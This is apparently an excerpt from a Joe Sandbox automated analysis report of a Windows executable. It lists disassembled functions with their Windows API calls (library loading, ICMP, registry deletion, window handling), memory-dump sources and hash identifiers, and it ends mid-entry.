                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalEnterHandleIncrementInterlockedModuleSection
                                                                                                                                                                  • String ID: KERNEL32.DLL$pI
                                                                                                                                                                  • API String ID: 2650740867-197072765
                                                                                                                                                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                  Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                  • API String ID: 2574300362-3530519716
                                                                                                                                                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                                  Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                  • API String ID: 2574300362-275556492
                                                                                                                                                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                                  Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                  • API String ID: 2574300362-58917771
                                                                                                                                                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                                  Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                  Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                                                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                                                                  Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                                                                  • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                                                                  • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                                                                                                                                                  Function 00411657 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 1646373207-1276376045
                                                                                                                                                                  • Opcode ID: e5967980360ca8e09bf433b7380d31dd14e74fd0abcf3be3ad432f86cd84717e
                                                                                                                                                                  • Instruction ID: f36f60c497584aae845ab64661926f25b8865bc4f9074f5e21fa0bd8eb1b54f8
                                                                                                                                                                  • Opcode Fuzzy Hash: e5967980360ca8e09bf433b7380d31dd14e74fd0abcf3be3ad432f86cd84717e
                                                                                                                                                                  • Instruction Fuzzy Hash: 63D0C9302803056B9B286FB29E09B5F3A5CAE80F90319082ABA08D1160DAAAD851866D
                                                                                                                                                                  Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                                                                  Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2808897238-0
                                                                                                                                                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                  Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                                  Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                                                  Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
